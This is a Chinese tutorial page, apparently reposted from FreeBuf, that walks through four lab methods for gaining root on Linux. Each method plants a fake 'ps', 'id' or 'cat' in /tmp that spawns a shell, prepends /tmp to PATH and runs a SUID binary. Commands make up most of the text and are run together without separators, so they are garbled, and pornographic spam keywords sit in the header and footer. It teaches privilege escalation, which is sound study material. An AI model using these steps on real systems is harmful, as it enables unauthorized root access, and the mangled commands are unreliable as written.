成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

黑客的Linux神技能:使用環(huán)境變量進(jìn)行提權(quán)

系統(tǒng) Linux
在這篇文章中,我將會為大家介紹一些使用環(huán)境變量進(jìn)行Linux提權(quán)的方法,包括在CTF challenges中使用到一些的技術(shù)。話不多說,讓我們進(jìn)入正題!

黑客的Linux神技能:使用環(huán)境變量進(jìn)行提權(quán)

在這篇文章中,我將會為大家介紹一些使用環(huán)境變量進(jìn)行Linux提權(quán)的方法,包括在CTF challenges中使用到一些的技術(shù)。話不多說,讓我們進(jìn)入正題!

介紹

PATH是Linux和類Unix操作系統(tǒng)中的環(huán)境變量,它指定存儲可執(zhí)行程序的所有bin和sbin目錄。當(dāng)用戶在終端上執(zhí)行任何命令時,它會通過PATH變量來響應(yīng)用戶執(zhí)行的命令,并向shell發(fā)送請求以搜索可執(zhí)行文件。超級用戶通常還具有/sbin和/usr/sbin條目,以便于系統(tǒng)管理命令的執(zhí)行。

使用echo命令顯示當(dāng)前PATH環(huán)境變量: 

  1. echo $PATH  
  2. /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games 

如果你在PATH變量中看到‘.’,則意味著登錄用戶可以從當(dāng)前目錄執(zhí)行二進(jìn)制文件/腳本,這對于攻擊者而言也是一個提權(quán)的絕好機(jī)會。這里之所以沒有指定程序的完整路徑,往往是因為編寫程序時的疏忽造成的。

方法1

Ubuntu LAB SET_UP

當(dāng)前,我們位于/home/raj目錄,我們將在其中創(chuàng)建一個名為/script的新目錄。在script目錄下,我們將編寫一個小型的c程序來調(diào)用系統(tǒng)二進(jìn)制文件的函數(shù)。

  1. pwdmkdir scriptcd /scriptnano demo.c 

 

正如你在demo.c文件中看到的,我們正在調(diào)用ps命令。

 

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權(quán)限。 

  1. lsgcc demo.c -o shellchmod u+s shellls -la shell 

 

受害者VM機(jī)器

假設(shè)我們已經(jīng)成功滲透目標(biāo),并進(jìn)入提權(quán)階段。我們通過ssh成功登錄到了受害者的機(jī)器。然后使用Find命令,搜索具有SUID或4000權(quán)限的文件。 

  1. find / -perm -u=s -type f 2>/dev/null 

通過上述命令,攻擊者可以枚舉出目標(biāo)系統(tǒng)上所有的可執(zhí)行文件,這里可以看到/home/raj/script/shell具有SUID權(quán)限。

 

進(jìn)入到/home/raj/script目錄,可以看到該目錄下有一個可執(zhí)行的“shell”文件,我們運(yùn)行這個文件。 

  1. /home/raj/script 

 

Echo命令 

  1. cd /tmpecho “/bin/sh” > pschmod 777 psecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shellwhoami 

 

Copy命令 

  1. cd /home/raj/script/cp /bin/sh /tmp/psecho $PATHexport PATH=/tmp:$PATH./shellwhoami 

 

Symlink命令 

  1. ln -s /bin/sh psexport PATH=.:$PATH./shellidwhoami 

注意:符號鏈接也叫軟鏈接,如果目錄具有完全權(quán)限,則它將成功運(yùn)行。在Ubuntu中symlink情況下,我們已經(jīng)賦予了/script目錄777的權(quán)限。

因此,攻擊者可以操縱環(huán)境變量PATH來進(jìn)行提權(quán),并獲得root訪問權(quán)限。

 

方法2

Ubuntu LAB SET_UP

重復(fù)上述步驟配置你的實驗環(huán)境,現(xiàn)在在腳本目錄中,我們將編寫一個小型的c程序來調(diào)用系統(tǒng)二進(jìn)制文件的函數(shù)。 

  1. pwdmkdir scriptcd /scriptnano demo.c 

正如你在demo.c文件中看到的,我們正在調(diào)用id命令。

 

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權(quán)限。 

  1. lsgcc demo.c -o shell2chmod u+s shell2ls -la shell2 

 

受害者VM機(jī)器

同樣,假設(shè)我們已經(jīng)成功滲透目標(biāo),并進(jìn)入提權(quán)階段。我們通過ssh成功登錄到了受害者的機(jī)器。然后使用Find命令,搜索具有SUID或4000權(quán)限的文件。在這里,我們可以看到/home/raj/script/shell2具有SUID權(quán)限。 

  1. find / -perm -u=s -type f 2>/dev/null 

進(jìn)入到/home/raj/script目錄,可以看到該目錄下有一個可執(zhí)行的“shell2”文件,我們運(yùn)行這個文件。 

  1. cd /home/raj/scriptls./shell2 

 

Echo命令 

  1. cd /tmpecho “/bin/sh” > idchmod 777 idecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shell2whoami 

 

方法3

Ubuntu LAB SET_UP

重復(fù)上述步驟配置你的實驗環(huán)境。正如你在demo.c文件中看到的,我們正在調(diào)用cat命令從etc/passwd文件中讀取內(nèi)容。

 

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權(quán)限。 

  1. lsgcc demo.c -o rajchmod u+s rajls -la raj 

 

受害者VM機(jī)器

同樣,假設(shè)我們已經(jīng)成功滲透目標(biāo),并進(jìn)入提權(quán)階段,通過執(zhí)行以下命令查看sudo用戶列表。 

  1. find / -perm -u=s -type f 2>/dev/null 

在這里,我們可以看到/home/raj/script/raj具有SUID權(quán)限,進(jìn)入到home/raj/script/目錄,可以看到該目錄下有一個可執(zhí)行的“raj”文件。所以當(dāng)我們運(yùn)行這個文件時,它會把etc/passwd文件作為輸出結(jié)果。 

  1. cd /home/raj/script/ls./raj 

 

Nano**編輯器** 

  1. cd /tmpnano cat 

現(xiàn)在,當(dāng)終端打開時輸入/bin/bash并保存。

 

 

  1. chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./rajwhoami 

 

方法4

Ubuntu LAB SET_UP

重復(fù)上述步驟配置你的實驗環(huán)境。正如你在demo.c文件中看到的,我們正在調(diào)用cat命令讀取/home/raj中的msg.txt中的內(nèi)容,但/home/raj中并沒有這樣的文件。

 

然后使用gcc編譯demo.c文件,并提升編譯文件的SUID權(quán)限。 

  1. lsgcc demo.c -o ignitechmod u+s ignitels -la ignite 

 

受害者VM機(jī)器

同樣,假設(shè)我們已經(jīng)成功滲透目標(biāo),并進(jìn)入提權(quán)階段,通過執(zhí)行以下命令查看sudo用戶列表 

  1. find / -perm -u=s -type f 2>/dev/null 

在這里,我們可以看到/home/raj/script/ignite具有SUID權(quán)限,進(jìn)入到/home/raj/script目錄,可以看到該目錄下有一個可執(zhí)行的“ignite”文件。所以當(dāng)我們運(yùn)行這個文件時,它會報錯“cat: /home/raj/msg.txt”文件或目錄不存在。 

  1. cd /home/raj/scriptls./ignite 

 

Vi編輯器 

  1. cd /tmpvi cat 

現(xiàn)在,當(dāng)終端打開時輸入/bin/bash并保存。

 

 

  1. chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./ignitewhoami 

 

原文鏈接:http://www.freebuf.com/articles/system/173903.html 

責(zé)任編輯:龐桂玉 來源: 馬哥Linux運(yùn)維
相關(guān)推薦

2021-02-15 15:52:27

Linux環(huán)境變量命令

2023-11-01 13:40:25

GolangGo

2021-06-18 08:43:20

環(huán)境變量Linux

2009-10-21 12:58:18

2021-11-29 10:25:16

Linux環(huán)境變量命令

2019-09-09 09:02:04

Linux腳本語言文本編輯器

2019-05-30 10:20:10

Linux環(huán)境變量命令

2021-01-06 08:04:30

Linux方式提權(quán)

2009-06-16 15:57:53

Java環(huán)境變量

2010-03-01 18:01:45

Python環(huán)境變量

2011-08-22 15:06:19

linux環(huán)境變量

2009-11-27 14:08:18

2011-06-14 09:21:55

Linux Qt 環(huán)境變量

2020-12-28 10:50:09

Linux環(huán)境變量命令

2010-06-07 11:33:11

Linux查看環(huán)境變量

2020-11-23 15:21:12

Linux環(huán)境變量

2018-01-03 12:49:48

Linux命令sudo

2009-06-15 16:28:30

JAVA環(huán)境變量

2011-05-31 13:41:50

Android 環(huán)境變量

2023-12-12 13:22:00

LinuxDocker容器
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 国产精品18hdxxxⅹ在线 | 97日日碰人人模人人澡分享吧 | 国产视频1区 | 一区二区三区福利视频 | 久久国产精品精品国产色婷婷 | ww亚洲ww亚在线观看 | 日本aaa视频 | 日韩一区二区成人 | 狠狠插狠狠操 | 99re99| 精品久久久久一区二区国产 | 天天干狠狠干 | 一区二区三区久久久 | 亚洲一区二区三区四区在线观看 | 男女国产网站 | 在线免费观看毛片 | 2019天天干天天操 | 午夜无码国产理论在线 | 久久久久久高清 | 国产色网站 | 亚洲一区精品视频 | 国产在线精品一区二区 | 中文字幕丁香5月 | 国产精品一区二区福利视频 | 免费看91| 亚洲美女视频 | 国产精品视频在线观看 | 欧美精品首页 | 午夜免费在线观看 | 网黄在线 | 好好的日在线视频 | 亚洲精品欧美一区二区三区 | 波多野结衣一区二区三区 | 亚洲日产精品 | 成人久草 | 亚洲日本欧美日韩高观看 | 黄网站涩免费蜜桃网站 | 国产色片| 免费在线观看成年人视频 | 2021天天躁夜夜看 | 一级国产精品一级国产精品片 |